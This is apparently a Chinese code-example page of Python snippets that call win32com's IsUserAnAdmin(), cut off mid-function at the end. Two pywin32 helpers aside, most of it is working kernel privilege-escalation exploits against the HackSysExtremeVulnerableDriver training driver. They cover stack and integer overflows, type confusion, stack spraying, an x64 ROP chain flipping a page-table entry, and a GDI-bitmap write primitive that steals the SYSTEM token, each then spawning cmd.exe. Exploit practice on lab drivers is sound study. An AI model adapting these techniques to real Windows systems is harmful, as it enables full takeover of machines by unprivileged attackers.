我们从Python开源项目中,提取了以下18个代码示例,用于说明如何使用win32com.shell.shell.IsUserAnAdmin()。注意:IsUserAnAdmin() 只反映当前进程令牌是否属于 Administrators 组;下面针对 HackSysExtremeVulnerableDriver 的内核提权示例仅把它用作利用后的成功检查(如果脚本本身已在提权的命令行中运行,即使利用失败它也会返回 True),而 pywin32 的 RegisterPythonServer 示例则用它来决定是否尝试注册 COM 服务器,这两类用法都不应被当作安全决策依据。
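def check_is_admin():
    """Return whether the current process token belongs to an administrator.

    The answer is computed once and cached in the module-level ``_is_admin``
    (``None`` means "not yet checked"); ``IsUserAnAdmin`` is imported lazily
    so that importing this module does not require ``win32com.shell``.

    Returns:
        bool: the cached ``IsUserAnAdmin()`` result.  When the call fails with
        ``winerror.E_NOTIMPL`` the result is ``True`` -- a deliberate fail-open
        kept from the original ("old platform, assume admin"), so this value
        must not be used as a security decision.

    Raises:
        pythoncom.com_error: any COM failure other than ``E_NOTIMPL``.
    """
    global _is_admin
    if _is_admin is None:
        from win32com.shell.shell import IsUserAnAdmin
        import pythoncom
        try:
            _is_admin = IsUserAnAdmin()
        # ``except X as exc`` works on Python 2.6+ and 3; ``except X, exc``
        # (the original) is Python-2-only syntax.
        except pythoncom.com_error as exc:
            if exc.hresult != winerror.E_NOTIMPL:
                raise
            # not impl on this platform - must be old - assume is admin
            _is_admin = True
    return _is_admin

# If this exception is raised by a test, the test is reported as a 'skip'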
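def trigger_integer_overflow():
    """Trigger HEVD's integer-overflow IOCTL (0x222027) and check for elevation.

    Builds padding, the shellcode pointer returned by ``heap_alloc_payload()``
    and the driver's 0xBAD0B0B0 terminator, then passes the buffer with an
    input length of 0xFFFFFFFF (the overflow trigger).  Success is judged by
    ``shell.IsUserAnAdmin()`` afterwards.

    Side effects: exits the process if the device cannot be opened; spawns
    ``cmd.exe`` via ``os.system`` on apparent success.

    NOTE(review): ``IsUserAnAdmin()`` reports the current token's Administrators
    membership, so if this script is launched from an already elevated prompt
    it prints success regardless of whether the exploit ran.
    """
    dwReturn = c_ulong()
    # GENERIC_READ | GENERIC_WRITE, OPEN_EXISTING
    driver_handle = kernel32.CreateFileA(
        "\\\\.\\HackSysExtremeVulnerableDriver", 0xC0000000, 0, None, 0x3, 0, None)
    if not driver_handle or driver_handle == -1:
        print("[!] Driver handle not found : Error " + str(ctypes.GetLastError()))
        sys.exit()

    # [-- BUFFER PADDING --][-- EXTRA PADDING --][-- SHELLCODE PTR --][-- STRING TERMINATOR --]
    print("[+] Constructing overflow string")
    evil_input = ("A" * 0x800
                  + "BBBB" * 10
                  + struct.pack("<L", heap_alloc_payload())
                  + struct.pack("<L", 0xBAD0B0B0))
    evil_size = len(evil_input)
    print("[+] Buf size: %d" % evil_size)

    # Hand the driver the ctypes buffer (the original allocated it but then
    # passed ``id(evil_input) + 20`` -- the offset of the character data in a
    # CPython 2 str object on 32-bit Windows, which breaks on other layouts).
    einput = create_string_buffer(evil_input, evil_size)
    evil_input_ptr = addressof(einput)

    print("[+] Triggering vuln ..")
    # 0xFFFFFFFF as the input length is what overflows; the 0xBAD0B0B0
    # terminator above bounds the copy per the original's layout comment.
    kernel32.DeviceIoControl(driver_handle, 0x222027, evil_input_ptr, 0xFFFFFFFF,
                             None, 0, byref(dwReturn), None)
    kernel32.CloseHandle(driver_handle)

    if shell.IsUserAnAdmin():
        print("[*] Enjoy Elevated Privs !\r\n")
        os.system('cmd.exe')
    else:
        print("[-] Exploit did not work. Re-run it!")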
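def trigger_nullpointer_dereference():
    """Trigger HEVD's null-pointer-dereference IOCTL (0x22202B).

    ``NtAllocateVirtualMemory_shellcode_ptr()`` is called first (presumably it
    prepares the low page the driver dereferences -- confirm against that
    helper), then a magic value that is *not* 0xBAD0B0B0 is sent so the
    driver's comparison fails and it takes the path this function is named
    for.  ``shell.IsUserAnAdmin()`` decides success.

    Side effects: exits the process if the device cannot be opened; spawns
    ``cmd.exe`` on apparent success.

    NOTE(review): ``IsUserAnAdmin()`` reflects the current token, so running
    from an already elevated prompt reports success even if nothing happened.
    """
    dwReturn = c_ulong()
    # GENERIC_READ | GENERIC_WRITE, OPEN_EXISTING
    driver_handle = kernel32.CreateFileA(
        "\\\\.\\HackSysExtremeVulnerableDriver", 0xC0000000, 0, None, 0x3, 0, None)
    if not driver_handle or driver_handle == -1:
        print("[!] Driver handle not found : Error " + str(ctypes.GetLastError()))
        sys.exit()

    NtAllocateVirtualMemory_shellcode_ptr()

    magicvalue = struct.pack("<L", 0xBAD0B0B1)  # as long as it's not 0xBAD0B0B0
    magicvalue_size = len(magicvalue)
    # ctypes buffer instead of ``id(magicvalue) + 20`` (a CPython-2/x86 str
    # layout offset): same bytes, layout-independent address.
    magic_buf = create_string_buffer(magicvalue, magicvalue_size)
    magicvalue_ptr = addressof(magic_buf)

    kernel32.DeviceIoControl(driver_handle, 0x22202B, magicvalue_ptr, magicvalue_size,
                             None, 0, byref(dwReturn), None)
    kernel32.CloseHandle(driver_handle)

    if shell.IsUserAnAdmin():
        print("[*] Enjoy Elevated Privs !\r\n")
        os.system('cmd.exe')
    else:
        print("[-] Exploit did not work. Re-run it!")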
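def trigger_stack_overflow():
    """Trigger HEVD's stack-overflow IOCTL (0x222003) on 32-bit.

    Sends 2080 filler bytes followed by the shellcode address from
    ``heap_alloc_payload()``; the filler length is the original author's
    distance to the saved return address and is build-specific.
    ``shell.IsUserAnAdmin()`` decides success.

    Side effects: exits the process if the device cannot be opened; spawns
    ``cmd.exe`` on apparent success.

    NOTE(review): ``IsUserAnAdmin()`` reflects the current token, so running
    from an already elevated prompt reports success regardless.
    """
    dwReturn = c_ulong()
    # GENERIC_READ | GENERIC_WRITE, OPEN_EXISTING
    driver_handle = kernel32.CreateFileA(
        "\\\\.\\HackSysExtremeVulnerableDriver", 0xC0000000, 0, None, 0x3, 0, None)
    if not driver_handle or driver_handle == -1:
        print("[!] Driver handle not found : Error " + str(ctypes.GetLastError()))
        sys.exit()

    print("[+] Constructing malicious buffer")
    evil_input = "\x41" * 2080 + struct.pack("<L", heap_alloc_payload())
    evil_size = len(evil_input)
    # ctypes buffer instead of ``id(evil_input) + 20`` (CPython-2/x86 str
    # layout offset): same bytes, layout-independent address.
    evil_buf = create_string_buffer(evil_input, evil_size)
    evil_input_ptr = addressof(evil_buf)
    print("[+] Buf size: %d" % evil_size)

    print("[+] Sending malicious buffer")
    print("[+] Triggering vuln ..")
    kernel32.DeviceIoControl(driver_handle, 0x222003, evil_input_ptr, evil_size,
                             None, 0, byref(dwReturn), None)
    kernel32.CloseHandle(driver_handle)

    if shell.IsUserAnAdmin():
        print("[*] Enjoy Elevated Privs !\r\n")
        os.system('cmd.exe')
    else:
        print("[!] Exploit did not work. Re-run it!")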
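def trigger_stack_overflow_GS():
    """Trigger HEVD's /GS-protected stack-overflow IOCTL (0x222007).

    The input comes from ``create_map_file()`` (see that helper) and is
    declared 4 bytes longer than the mapping: per the original author's
    comment the driver's copy then faults on the unmapped byte before the
    stack cookie is checked.  ``shell.IsUserAnAdmin()`` decides success.

    Side effects: exits the process if the device cannot be opened; spawns
    ``cmd.exe`` on apparent success.

    NOTE(review): ``IsUserAnAdmin()`` reflects the current token, so running
    from an already elevated prompt reports success regardless.
    """
    dwReturn = c_ulong()
    # GENERIC_READ | GENERIC_WRITE, OPEN_EXISTING
    driver_handle = kernel32.CreateFileA(
        "\\\\.\\HackSysExtremeVulnerableDriver", 0xC0000000, 0, None, 0x3, 0, None)
    if not driver_handle or driver_handle == -1:
        print("[!] Driver handle not found : Error " + str(ctypes.GetLastError()))
        sys.exit()

    buffer_ptr, buffer_size = create_map_file()
    print("[+] Sending malicious buffer")
    print("[+] Triggering vuln ..")
    # Note buffer_size + 4 : +4 resides outside the mapped file to trigger an
    # exception when memcpy the region before GS check, which BSODs box
    kernel32.DeviceIoControl(driver_handle, 0x222007, buffer_ptr, buffer_size + 4,
                             None, 0, byref(dwReturn), None)
    kernel32.CloseHandle(driver_handle)  # the original leaked the handle

    if shell.IsUserAnAdmin():
        print("[*] Enjoy Elevated Privs !\r\n")
        os.system('cmd.exe')
    else:
        print("[!] Exploit did not work. Re-run it!")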
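def trigger_uninitialized_heap_variable():
    """Trigger HEVD's uninitialized-heap-variable IOCTL (0x00222033).

    ``tainting_lookaside()`` is called immediately before the IOCTL (it is
    the heap grooming step; see that helper), and a magic value that is not
    0xBAD0B0B0 is sent so the driver leaves its heap variable uninitialized.
    ``shell.IsUserAnAdmin()`` decides success.

    Side effects: exits the process if the device cannot be opened; spawns
    ``cmd.exe`` on apparent success.

    NOTE(review): ``IsUserAnAdmin()`` reflects the current token, so running
    from an already elevated prompt reports success regardless.
    """
    dwReturn = c_ulong()
    # GENERIC_READ | GENERIC_WRITE, OPEN_EXISTING
    driver_handle = kernel32.CreateFileA(
        "\\\\.\\HackSysExtremeVulnerableDriver", 0xC0000000, 0, None, 0x3, 0, None)
    if not driver_handle or driver_handle == -1:
        print("[!] Driver handle not found : Error " + str(ctypes.GetLastError()))
        sys.exit()

    magicvalue = struct.pack('<I', 0xBAD0B0B1)
    magicvalue_size = len(magicvalue)
    # Allocate the ctypes buffer *before* tainting_lookaside(), keeping the
    # original's ordering (input built first, groom, then IOCTL).  Replaces
    # ``id(magicvalue) + 20``, a CPython-2/x86 str layout offset.
    magic_buf = create_string_buffer(magicvalue, magicvalue_size)
    magicvalue_ptr = addressof(magic_buf)

    tainting_lookaside()

    print("[+] Triggering vuln ..")
    kernel32.DeviceIoControl(driver_handle, 0x00222033, magicvalue_ptr, magicvalue_size,
                             None, 0, byref(dwReturn), None)
    kernel32.CloseHandle(driver_handle)

    if shell.IsUserAnAdmin():
        print("[*] Enjoy Elevated Privs !\r\n")
        os.system('cmd.exe')
    else:
        print("[-] Exploit did not work. Re-run it!")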
def check_is_admin():
    """Return whether the current process token is an administrator's.

    The result of ``IsUserAnAdmin()`` is cached in the module global
    ``_is_admin``; ``None`` there means the check has not run yet.  The
    ``win32com.shell`` import is deferred until first use.

    Returns:
        bool: ``IsUserAnAdmin()``'s answer, or ``True`` when that call fails
        with ``winerror.E_NOTIMPL`` (old platform, assumed admin -- a
        fail-open the callers must not treat as a security decision).

    Raises:
        pythoncom.com_error: for any COM failure other than ``E_NOTIMPL``.
    """
    global _is_admin
    if _is_admin is not None:
        return _is_admin

    from win32com.shell.shell import IsUserAnAdmin
    import pythoncom
    try:
        result = IsUserAnAdmin()
    except pythoncom.com_error as exc:
        if exc.hresult != winerror.E_NOTIMPL:
            raise
        # Not implemented here: treat as an old platform and assume admin.
        result = True
    _is_admin = result
    return _is_admin

# If this exception is raised by a test, the test is reported as a 'skip'
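def trigger_arbitrary_overwrite():
    """Trigger HEVD's arbitrary-overwrite IOCTL (0x22200B) on 32-bit.

    Sends a (What, Where) pair: What is the address of a ``c_void_p`` holding
    the shellcode pointer from ``heap_alloc_payload()``, Where is
    ``get_HDT_kernel_address() + 4`` (HalDispatchTable + 4 per the original's
    comment).  ``NtQueryIntervalProfile`` is then called to reach the
    overwritten pointer, and ``shell.IsUserAnAdmin()`` decides success.

    Side effects: exits the process if the device cannot be opened; spawns
    ``cmd.exe`` on apparent success.

    NOTE(review): ``IsUserAnAdmin()`` reflects the current token, so running
    from an already elevated prompt reports success regardless.
    """
    dwReturn = c_ulong()
    # GENERIC_READ | GENERIC_WRITE, OPEN_EXISTING
    driver_handle = kernel32.CreateFileA(
        "\\\\.\\HackSysExtremeVulnerableDriver", 0xC0000000, 0, None, 0x3, 0, None)
    if not driver_handle or driver_handle == -1:
        print("[!] Driver handle not found : Error " + str(ctypes.GetLastError()))
        sys.exit()

    # [ -- WHAT (Shellcode pointer) -- ] [ -- WHERE (HDT_kernel_address + 4)-- ]
    write_what = heap_alloc_payload()
    write_where = get_HDT_kernel_address() + 4
    # What is read *through*: it must point at memory holding the value to
    # write, so ``write_what_ptr`` has to stay alive until the IOCTL returns.
    write_what_ptr = c_void_p(write_what)
    evil_input = struct.pack("<L", addressof(write_what_ptr)) + struct.pack("<L", write_where)
    evil_size = len(evil_input)
    # ctypes buffer instead of ``id(evil_input) + 20`` (CPython-2/x86 str
    # layout offset): same bytes, layout-independent address.
    evil_buf = create_string_buffer(evil_input, evil_size)
    evil_input_ptr = addressof(evil_buf)

    print("[+] Writing 0x%X at address 0x%X" % (write_what, write_where))
    kernel32.DeviceIoControl(driver_handle, 0x22200B, evil_input_ptr, evil_size,
                             None, 0, byref(dwReturn), None)
    kernel32.CloseHandle(driver_handle)

    print("[+] Calling NtQueryIntervalProfile to trigger vuln")
    arb = c_ulong(0)
    ntdll.NtQueryIntervalProfile(0x1337, byref(arb))

    if shell.IsUserAnAdmin():
        print("[*] Enjoy Elevated Privs !\r\n")
        os.system('cmd.exe')
    else:
        print("[-] Exploit did not work. Re-run it!")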
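def trigger_uninitialized_stack_variable():
    """Trigger HEVD's uninitialized-stack-variable IOCTL (0x22202F).

    Sprays the kernel stack with the shellcode address (1024 copies handed
    to ``NtMapUserPhysicalPages``), then sends a magic value that is not
    0xBAD0B0B0 so the driver uses its uninitialized stack variable.
    ``shell.IsUserAnAdmin()`` decides success.

    Side effects: exits the process if the device cannot be opened; spawns
    ``cmd.exe`` on apparent success.

    NOTE(review): ``IsUserAnAdmin()`` reflects the current token, so running
    from an already elevated prompt reports success regardless.
    """
    dwReturn = c_ulong()
    # GENERIC_READ | GENERIC_WRITE, OPEN_EXISTING
    driver_handle = kernel32.CreateFileA(
        "\\\\.\\HackSysExtremeVulnerableDriver", 0xC0000000, 0, None, 0x3, 0, None)
    if not driver_handle or driver_handle == -1:
        print("[!] Driver handle not found : Error " + str(ctypes.GetLastError()))
        sys.exit()

    magicvalue = struct.pack("<L", 0xBAD0B0B1)  # as long as it's not 0xBAD0B0B0
    magicvalue_size = len(magicvalue)
    print("[+] Buf size: %d" % magicvalue_size)
    # The original allocated this buffer but then passed ``id(magicvalue) + 20``
    # (a CPython-2/x86 str layout offset); use the buffer it already made.
    einput = create_string_buffer(magicvalue, magicvalue_size)
    magicvalue_ptr = addressof(einput)

    # stack spray
    shellcode_ptr = heap_alloc_payload()
    print("[+] Spraying stack with address: 0x%X" % shellcode_ptr)
    print("[+] Triggering vuln ..")
    ntdll.NtMapUserPhysicalPages(0, 1024, struct.pack("<L", shellcode_ptr) * 1024)
    kernel32.DeviceIoControl(driver_handle, 0x22202F, magicvalue_ptr, magicvalue_size,
                             None, 0, byref(dwReturn), None)
    kernel32.CloseHandle(driver_handle)

    if shell.IsUserAnAdmin():
        print("[*] Enjoy Elevated Privs !\r\n")
        os.system('cmd.exe')
    else:
        print("[-] Exploit did not work. Re-run it!")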
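def trigger_type_confusion():
    """Trigger HEVD's type-confusion IOCTL (0x222023).

    Sends a USER_TYPE_CONFUSION_OBJECT whose ``ObjectID`` is filler and whose
    ``ObjectType`` is the shellcode address from ``heap_alloc_payload()`` (the
    driver confuses that field with a pointer, per the function name).
    ``shell.IsUserAnAdmin()`` decides success.

    Side effects: exits the process if the device cannot be opened; spawns
    ``cmd.exe`` on apparent success.

    NOTE(review): ``IsUserAnAdmin()`` reflects the current token, so running
    from an already elevated prompt reports success regardless.
    """
    dwReturn = c_ulong()
    # GENERIC_READ | GENERIC_WRITE, OPEN_EXISTING
    driver_handle = kernel32.CreateFileA(
        "\\\\.\\HackSysExtremeVulnerableDriver", 0xC0000000, 0, None, 0x3, 0, None)
    if not driver_handle or driver_handle == -1:
        print("[!] Driver handle not found : Error " + str(ctypes.GetLastError()))
        sys.exit()

    ####
    # typedef struct _USER_TYPE_CONFUSION_OBJECT {
    #     ULONG ObjectID;
    #     ULONG ObjectType;
    # } USER_TYPE_CONFUSION_OBJECT, *PUSER_TYPE_CONFUSION_OBJECT;
    ####
    print("[+] Constructing USER_TYPE_CONFUSION_OBJECT")
    evil_input = "\x41" * 4 + struct.pack("<L", heap_alloc_payload())
    evil_size = len(evil_input)
    # ctypes buffer instead of ``id(evil_input) + 20`` (CPython-2/x86 str
    # layout offset): same bytes, layout-independent address.
    evil_buf = create_string_buffer(evil_input, evil_size)
    evil_input_ptr = addressof(evil_buf)
    print("[+] Buf size: %d" % evil_size)

    print("[+] Sending confusion object")
    print("[+] Triggering vuln ..")
    kernel32.DeviceIoControl(driver_handle, 0x222023, evil_input_ptr, evil_size,
                             None, 0, byref(dwReturn), None)
    kernel32.CloseHandle(driver_handle)

    if shell.IsUserAnAdmin():
        print("[*] Enjoy Elevated Privs !\r\n")
        os.system('cmd.exe')
    else:
        print("[!] Exploit did not work. Re-run it!")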
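def trigger_stack_overflow():
    """Trigger HEVD's stack-overflow IOCTL (0x222003) on x64 with a ROP chain.

    After 0x808 filler bytes the chain (gadgets in hal.dll / win32kfull.sys at
    hard-coded offsets from ``get_base_address``) stores 0x63000000 into the
    PTE of the shellcode page (``get_pxe_address(shellcode_ptr) - 3``), which
    per the original's comments flips the page to supervisor mode, flushes
    the cache and returns into ``virtual_alloc_payload()``'s shellcode.
    ``shell.IsUserAnAdmin()`` decides success.

    NOTE(review): every gadget offset and the 0x808 filler length are specific
    to one Windows build -- verify them before reuse.

    NOTE(review): ``IsUserAnAdmin()`` reflects the current token, so running
    from an already elevated prompt reports success regardless.
    """
    dwReturn = c_ulong()
    # GENERIC_READ | GENERIC_WRITE, OPEN_EXISTING
    driver_handle = kernel32.CreateFileA(
        "\\\\.\\HackSysExtremeVulnerableDriver", 0xC0000000, 0, None, 0x3, 0, None)
    if not driver_handle or driver_handle == -1:
        debug_print("[!] Driver handle not found : Error " + str(ctypes.GetLastError()))
        sys.exit()

    hal_base_address, win32kfull_base_address = get_base_address(["hal.dll", "win32kfull.sys"])
    shellcode_ptr = virtual_alloc_payload()

    debug_print("[+] Constructing malicious buffer w/ ROP chain")
    rop_chain = [
        win32kfull_base_address + 0xD1122,        # POP RDX; RETN
        0x63000000,                               # 0x63000000 -> Supervisor Mode
        hal_base_address + 0xFDB2,                # POP RAX; RETN
        get_pxe_address(shellcode_ptr) - 3,       # PTE(shellcode ptr) - 3
        hal_base_address + 0x9943,                # MOV [RAX], EDX; RETN
        hal_base_address + 0x19B20,               # Invalidate Cache
        shellcode_ptr,                            # shellcode ptr
    ]
    evil_input = "\x41" * 0x808  # junk
    evil_input += "".join(struct.pack("<Q", gadget) for gadget in rop_chain)
    evil_size = len(evil_input)
    # ctypes buffer instead of ``id(evil_input) + 32`` (the character-data
    # offset of a CPython 2 str on x64 Windows): layout-independent address.
    evil_buf = create_string_buffer(evil_input, evil_size)
    evil_input_ptr = addressof(evil_buf)
    debug_print("[+] Buf size: 0x%X" % evil_size)

    debug_print("[+] Sending malicious buffer")
    debug_print("[+] Triggering vuln ..")
    kernel32.DeviceIoControl(driver_handle, 0x222003, evil_input_ptr, evil_size,
                             None, 0, byref(dwReturn), None)
    kernel32.CloseHandle(driver_handle)

    if shell.IsUserAnAdmin():
        debug_print("[*] Enjoy Elevated Privs !\n")
        os.system('cmd.exe')
    else:
        debug_print("[!] Exploit did not work. Re-run it!")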
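def RegisterPythonServer(filename, progids=None, verbose=0):
    """Register the Python COM server in ``filename`` unless it already is.

    Args:
        filename: path of the server module; it is run with ``--unattended``
            by this interpreter to perform the registration.
        progids: a ProgID or list of ProgIDs the module implements.  When
            given, each is resolved to a CLSID and its ``InprocServer32``
            value checked; if every one points at this Python's pythoncom
            DLL the registration is skipped.
        verbose: if truthy, print which engine is being registered.

    Raises:
        pythoncom.com_error: ``CO_E_CLASSSTRING`` when registration is needed
            but the current user is not an administrator.
        RuntimeError: when the registration process exits non-zero.

    NOTE(review): if ``IsUserAnAdmin`` itself raises a COM error the code
    assumes the user *is* an administrator (fail-open, kept from the original
    for old OS versions); registration then simply fails at the subprocess.
    """
    import subprocess

    why_not = None
    if progids:
        if isinstance(progids, str):
            progids = [progids]
        # we know the CLSIDs we need, but we might not be an admin user
        # and otherwise unable to register them. So as long as the progids
        # exist and the DLL points at our version, assume it already is.
        for progid in progids:
            try:
                clsid = pythoncom.MakeIID(progid)
            except pythoncom.com_error:
                # no progid - not registered.
                break
            # have a CLSID - open it.
            try:
                HKCR = winreg.HKEY_CLASSES_ROOT
                hk = winreg.OpenKey(HKCR, "CLSID\\%s" % clsid)
                dll = winreg.QueryValue(hk, "InprocServer32")
            except WindowsError:
                # no CLSID or InProcServer32 - not good!
                break
            ok_files = [os.path.basename(pythoncom.__file__),
                        'pythoncomloader%d%d.dll' % (sys.version_info[0], sys.version_info[1])]
            if os.path.basename(dll) not in ok_files:
                why_not = "%r is registered against a different Python version (%s)" % (progid, dll)
                break
        else:
            # every progid resolved to our DLL - already registered.
            return

    # needs registration - see if its likely!
    try:
        from win32com.shell.shell import IsUserAnAdmin
    except ImportError:
        print("Can't import win32com.shell - no idea if you are an admin or not?")
        is_admin = False
    else:
        try:
            is_admin = IsUserAnAdmin()
        except pythoncom.com_error:
            # old, less-secure OS - assume *is* admin.
            is_admin = True
    if not is_admin:
        # The original indexed progids[0] unconditionally, which raised
        # TypeError when no progids were given; name the file in that case.
        what = progids[0] if progids else filename
        msg = "%r isn't registered, but I'm not an administrator who can register it." % what
        if why_not:
            msg += "\n(registration check failed as %s)" % why_not
        # throw a normal "class not registered" exception - we don't report
        # them the same way as "real" errors.
        raise pythoncom.com_error(winerror.CO_E_CLASSSTRING, msg, None, -1)

    # so theoretically we are able to register it.
    # Run the interpreter directly instead of a cmd.exe string: the original
    # left the interpreter path unquoted (breaks when it contains a space) and
    # spliced ``filename`` into a shell command line.  Output is discarded as
    # before (the original's ``> nul 2>&1``).
    args = [win32api.GetModuleFileName(0), filename, "--unattended"]
    cmd = subprocess.list2cmdline(args)
    if verbose:
        print("Registering engine", filename)
    with open(os.devnull, "w") as devnull:
        rc = subprocess.call(args, stdout=devnull, stderr=subprocess.STDOUT)
    if rc:
        print("Registration command was:")
        print(cmd)
        raise RuntimeError("Registration of engine '%s' failed" % filename)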
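def RegisterPythonServer(filename, progids=None, verbose=0):
    """Register the Python COM server in ``filename`` unless it already is.

    Args:
        filename: path of the server module; it is run with ``--unattended``
            by this interpreter to perform the registration.
        progids: a ProgID or list of ProgIDs the module implements.  When
            given, each is resolved to a CLSID and its ``InprocServer32``
            value checked; if every one points at this Python's pythoncom
            DLL the registration is skipped.
        verbose: if truthy, print which engine is being registered.

    Raises:
        pythoncom.com_error: ``CO_E_CLASSSTRING`` when registration is needed
            but the current user is not an administrator.
        RuntimeError: when the registration process exits non-zero.

    NOTE(review): if ``IsUserAnAdmin`` itself raises a COM error the code
    assumes the user *is* an administrator (fail-open, kept from the original
    for old OS versions); registration then simply fails at the subprocess.
    """
    import subprocess

    why_not = None
    if progids:
        if isinstance(progids, basestring):
            progids = [progids]
        # we know the CLSIDs we need, but we might not be an admin user
        # and otherwise unable to register them. So as long as the progids
        # exist and the DLL points at our version, assume it already is.
        for progid in progids:
            try:
                clsid = pythoncom.MakeIID(progid)
            except pythoncom.com_error:
                # no progid - not registered.
                break
            # have a CLSID - open it.
            try:
                HKCR = _winreg.HKEY_CLASSES_ROOT
                hk = _winreg.OpenKey(HKCR, "CLSID\\%s" % clsid)
                dll = _winreg.QueryValue(hk, "InprocServer32")
            except WindowsError:
                # no CLSID or InProcServer32 - not good!
                break
            ok_files = [os.path.basename(pythoncom.__file__),
                        'pythoncomloader%d%d.dll' % (sys.version_info[0], sys.version_info[1])]
            if os.path.basename(dll) not in ok_files:
                why_not = "%r is registered against a different Python version (%s)" % (progid, dll)
                break
        else:
            # every progid resolved to our DLL - already registered.
            return

    # needs registration - see if its likely!
    try:
        from win32com.shell.shell import IsUserAnAdmin
    except ImportError:
        print("Can't import win32com.shell - no idea if you are an admin or not?")
        is_admin = False
    else:
        try:
            is_admin = IsUserAnAdmin()
        except pythoncom.com_error:
            # old, less-secure OS - assume *is* admin.
            is_admin = True
    if not is_admin:
        # The original indexed progids[0] unconditionally, which raised
        # TypeError when no progids were given; name the file in that case.
        what = progids[0] if progids else filename
        msg = "%r isn't registered, but I'm not an administrator who can register it." % what
        if why_not:
            msg += "\n(registration check failed as %s)" % why_not
        # throw a normal "class not registered" exception - we don't report
        # them the same way as "real" errors.
        raise pythoncom.com_error(winerror.CO_E_CLASSSTRING, msg, None, -1)

    # so theoretically we are able to register it.
    # Run the interpreter directly instead of a cmd.exe string: the original
    # left the interpreter path unquoted (breaks when it contains a space) and
    # spliced ``filename`` into a shell command line.  Output is discarded as
    # before (the original's ``> nul 2>&1``).
    args = [win32api.GetModuleFileName(0), filename, "--unattended"]
    cmd = subprocess.list2cmdline(args)
    if verbose:
        print("Registering engine %s" % filename)
    devnull = open(os.devnull, "w")
    try:
        rc = subprocess.call(args, stdout=devnull, stderr=subprocess.STDOUT)
    finally:
        devnull.close()
    if rc:
        print("Registration command was:")
        print(cmd)
        raise RuntimeError("Registration of engine '%s' failed" % filename)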
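def trigger_arbitrary_overwrite():
    """Main logic: HEVD arbitrary overwrite (0x22200B) on x64 via GDI bitmaps.

    Two bitmaps ("manager" and "worker") are placed into freed accelerator
    table allocations (``alloc_free_accelerator_tables`` / ``setup_*_bitmap``);
    the driver's write-what-where then points the manager bitmap's pvscan0 at
    the worker's pvscan0, giving ``read_virtual``/``write_virtual`` a kernel
    read/write primitive.  That primitive copies the SYSTEM process token
    (``get_PsISP_kernel_address`` + ``token_offset``) over the current
    process's token.  ``shell.IsUserAnAdmin()`` decides success.

    Side effects: exits the process if the device cannot be opened; modifies
    ``hManager``/``hWorker`` through the setup helpers; spawns ``cmd.exe`` on
    apparent success.  The original token is not saved or restored.

    NOTE(review): ``token_offset`` and the 0x50 pvscan0 offset are build
    specific -- confirm against the target.  ``IsUserAnAdmin()`` reflects the
    current token, so running from an already elevated prompt reports
    success regardless of whether the token swap happened.
    """
    # GENERIC_READ | GENERIC_WRITE, OPEN_EXISTING
    driver_handle = kernel32.CreateFileA(
        "\\\\.\\HackSysExtremeVulnerableDriver", 0xC0000000, 0, None, 0x3, 0, None)
    if not driver_handle or driver_handle == -1:
        print("[!] Driver handle not found : Error " + str(ctypes.GetLastError()))
        sys.exit()

    global hManager, hWorker

    # Massaging heap for Manager Bitmap
    debug_print("[>] Setting up Manager Bitmap:")
    debug_print("\t[+] Allocating and Freeing AcceleratorTables")
    dup_address = alloc_free_accelerator_tables()
    setup_manager_bitmap()
    hManager_pvscan0_offset = dup_address + 0x50
    debug_print("\t[+] Manager Bitmap pvscan0 offset: 0x%X" % hManager_pvscan0_offset)

    # Massaging heap for Worker Bitmap
    debug_print("\n[>] Setting up Worker Bitmap:")
    debug_print("\t[+] Allocating and Freeing AcceleratorTables")
    dup_address = alloc_free_accelerator_tables()
    setup_worker_bitmap()
    hWorker_pvscan0_offset = dup_address + 0x50
    debug_print("\t[+] Worker Bitmap pvscan0 offset: 0x%X" % hWorker_pvscan0_offset)

    # Using WWW to overwrite Manager pvscan0 value with address of Worker pvscan0
    write_where = hManager_pvscan0_offset
    # What is read through, so this object must outlive the IOCTL.
    write_what_ptr = c_void_p(hWorker_pvscan0_offset)
    evil_input = struct.pack("<Q", addressof(write_what_ptr)) + struct.pack("<Q", write_where)
    evil_size = len(evil_input)
    # ctypes buffer instead of ``id(evil_input) + 32`` (the character-data
    # offset of a CPython 2 str on x64 Windows): layout-independent address.
    evil_buf = create_string_buffer(evil_input, evil_size)
    evil_input_ptr = addressof(evil_buf)

    debug_print("\n[+] Triggering W-W-W to overwrite Manager pvscan0 value with Worker pvscan0 address")
    dwReturn = c_ulong()
    kernel32.DeviceIoControl(driver_handle, 0x22200B, evil_input_ptr, evil_size,
                             None, 0, byref(dwReturn), None)
    kernel32.CloseHandle(driver_handle)

    # Get SYSTEM EPROCESS
    system_EPROCESS = get_PsISP_kernel_address()
    debug_print("\n[+] SYSTEM EPROCESS: 0x%X" % system_EPROCESS)

    # Get current EPROCESS
    current_EPROCESS = get_current_eprocess(system_EPROCESS)
    debug_print("[+] current EPROCESS: 0x%X" % current_EPROCESS)

    system_token = c_ulonglong()
    debug_print("\r\n[+] Reading System TOKEN")
    read_virtual(system_EPROCESS + token_offset, byref(system_token), sizeof(system_token))

    debug_print("[+] Writing System TOKEN")
    write_virtual(current_EPROCESS + token_offset, byref(system_token), sizeof(system_token))

    if shell.IsUserAnAdmin():
        print("[*] Enjoy Elevated Privs !\r\n")
        os.system('cmd.exe')
    else:
        print("[-] Exploit did not work. Re-run it!")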
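def trigger_arbitrary_overwrite():
    """Main logic: HEVD arbitrary overwrite (0x22200B) on x64 via GDI bitmaps.

    ``findHMValidateHandle()`` is resolved first (used by the window-based
    heap grooming; see that helper).  Two bitmaps ("manager" and "worker")
    are placed into freed window allocations (``alloc_free_windows`` /
    ``setup_*_bitmap``); the driver's write-what-where then points the
    manager bitmap's pvscan0 at the worker's pvscan0, giving
    ``read_virtual``/``write_virtual`` a kernel read/write primitive that
    copies the SYSTEM process token (``get_PsISP_kernel_address`` +
    ``token_offset``) over the current process's token.
    ``shell.IsUserAnAdmin()`` decides success.

    Side effects: exits the process if the device cannot be opened; modifies
    ``hManager``/``hWorker`` through the setup helpers; spawns ``cmd.exe`` on
    apparent success.  The original token is not saved or restored.

    NOTE(review): ``token_offset`` and the 0x50 pvscan0 offset are build
    specific -- confirm against the target.  ``IsUserAnAdmin()`` reflects the
    current token, so running from an already elevated prompt reports
    success regardless of whether the token swap happened.
    """
    # GENERIC_READ | GENERIC_WRITE, OPEN_EXISTING
    driver_handle = kernel32.CreateFileA(
        "\\\\.\\HackSysExtremeVulnerableDriver", 0xC0000000, 0, None, 0x3, 0, None)
    if not driver_handle or driver_handle == -1:
        print("[!] Driver handle not found : Error " + str(ctypes.GetLastError()))
        sys.exit()

    global hManager, hWorker

    # Calculate pointer to HMValidateHandle
    findHMValidateHandle()

    # Massaging heap for Manager Bitmap
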